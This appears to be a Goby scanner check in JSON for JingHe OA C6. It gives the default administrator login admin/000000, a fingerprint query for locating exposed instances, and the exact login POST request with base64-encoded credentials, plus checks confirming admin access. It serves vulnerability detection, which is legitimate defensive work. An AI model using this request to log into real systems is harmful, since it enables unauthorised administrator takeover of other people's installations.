Goby/json/JingHe_OA_C6_Default_passwo...

62 lines
2.4 KiB
JSON

{
"Name": "JingHe OA C6 Default password",
"Level": "2",
"Tags": [
"Default password"
],
"GobyQuery": "app=\"Jinher-OA\"",
"Description": "JinHe OA C6 has the default account password of admin/000000, and the attacker will log in as an administrator",
"Product": "JingHe OA C6",
"Homepage": "jinher.com",
"Author": "PeiQi",
"Impact": "<p>The attacker will log in as an administrator</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/C6/Jhsoft.Web.login/AjaxForLogin.aspx",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "OK",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "系统管理员",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 22:43:50",
"GobyVersion": "1.8.255"
}